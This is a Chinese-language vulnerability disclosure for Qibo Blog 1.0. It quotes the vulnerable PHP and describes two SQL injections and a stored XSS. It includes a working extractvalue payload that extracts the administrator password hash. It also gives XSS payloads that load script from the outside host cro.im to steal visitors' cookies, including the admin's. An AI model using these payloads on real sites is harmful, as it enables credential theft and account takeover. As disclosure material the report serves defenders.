### 简要描述:
该博客系统是一个类似博客大巴的公共博客平台
两个高危注入+一个可打管理员账号的xss
最新的blog 1.0
http://down.qibosoft.com/down.php?v=blog1.0
### 详细说明:
http://localhost/qibo/bk/blog/member/postlog.php?job=postlog
注册成会员之后发布日志
注入一
问题代码\blog\member\postlog.php
```
if($job=="postlog")
{
if($step==2){
if(!$title){
showerr("标题不能为空");
}elseif(!$content){
showerr("内容不能为空");
}
if($file_db){
foreach( $file_db AS $key=>$value){
if((eregi("jpg$",$value)||eregi("gif$",$value))&&!eregi("sysimage\/file",$value)){
$picurl=$value;
break;
}
}
}
if($picurl&&($webdb[if_gdimg]))
{
$smallpic="$picurl.gif";
$Newpicpath=ROOT_PATH."$webdb[updir]/$smallpic";
gdpic(ROOT_PATH."$webdb[updir]/$picurl",$Newpicpath,200,150);
if( file_exists($Newpicpath) )
{
$picurl="$smallpic";
}
$ispic=1;
}
$db->query("INSERT INTO `{$pre}blog_log_article` (`title`, `albumid`, `albumname`, `fid`, `fname`, `posttime`, `list`, `uid`, `username`,`picurl`, `ispic`, `yz`, `keywords`, `ishtml`, `ip`,`content`,passwd,viewtype) VALUES ('$title','$albumid','$albumname','$fid','$fname','$timestamp','$timestamp','$lfjuid','$lfjid','$picurl','$ispic','$yz','$keywords','1','$onlineip','$content','$passwd','$viewtype')");
@extract($db->get_one("SELECT * FROM `{$pre}blog_log_article` ORDER BY id DESC LIMIT 1"));
refreshto("list.php?type=log&job=list","<a href='../index.php?file=viewlog&uid=$lfjuid&id=$id' target='_blank'>查看效果</a> <a href='list.php?type=log&job=list'>返回列表</a> <a href='?job=$job'>继续发表</a>",600);
```
[<img src="https://images.seebug.org/upload/201502/07131720a4900af5ef6959858098d98fe57b151b.png" alt="fenlei.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07131720a4900af5ef6959858098d98fe57b151b.png)
其中albumname 入库后出库,导致了sql注入
```
if($albumid==-1)
{
if(strlen($newalbum)>30)
{
showerr("分类名称不能大于30个字符");
}
elseif($newalbum=='')
{
$newalbum="新分类";
}
$db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')");
@extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1"));
}
elseif($albumid)
{
@extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' "));
}
```
但是限制了长度 只能小于30位
```
if(strlen($newalbum)>30)
```
不过后面的content,passwd无长度限制 而且全部可控,所以造成注入
利用注释 分别在两个输入点 注入出管理员密码
新建的分类填入a'\ 创建完成之后 content填入所示
[<img src="https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png" alt="_Q6L}OC~A{93K@[W@AWB~@X.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png)
其中content默认有两个2换行 换行会影响注释符号#
提交 burp拦截 我们在burp里面抓包去掉就行
[<img src="https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png" alt="qudiao.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png)
```
content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))#
```
[<img src="https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png" alt="sucessu.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png)
同样的
注入二在blog\member\postphoto.php
```
if($albumid==-1)
{
if(strlen($newalbum)>30)
{
showerr("分类名称不能大于30个字符");
}
elseif($newalbum=='')
{
$newalbum="新分类";
}
$db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')");
@extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1"));
}
elseif($albumid)
{
@extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' "));
}
}
```
问题差不多 不一一演示了
XSS
发布文章的正文 点击选择源码编辑模式 就可插入xss 其中只粗略过滤了javascript等关键字
但我们知道这远远不够
[<img src="https://images.seebug.org/upload/201502/07134526f4bca912129c9d886ffabdc2b44879f6.png" alt="xss.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07134526f4bca912129c9d886ffabdc2b44879f6.png)
成功弹窗
[<img src="https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg" alt="xssuccess.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg)
我们插入<script/src=//cro.im/2B></script>
或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可
[<img src="https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg" alt="crom1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg)
任意人员(包括管理员)访问 可以看到平台hook加载了
[<img src="https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png" alt="crom2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png)
打到了cookies
### 漏洞证明:
新建的分类填入a'/* 创建完成之后 content填入所示
[<img src="https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png" alt="_Q6L}OC~A{93K@[W@AWB~@X.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png)
其中content默认有两个2换行 换行会影响注释符号# 我们在burp里面抓包去掉就行
[<img src="https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png" alt="qudiao.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png)
```
content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))#
```
[<img src="https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png" alt="sucessu.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png)
[<img src="https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg" alt="xssuccess.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg)
我们插入<script/src=//cro.im/2B></script>
或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可
[<img src="https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg" alt="crom1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg)
任意人员(包括管理员)访问 可以看到平台hook加载了
[<img src="https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png" alt="crom2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png)
打到了cookies
暂无评论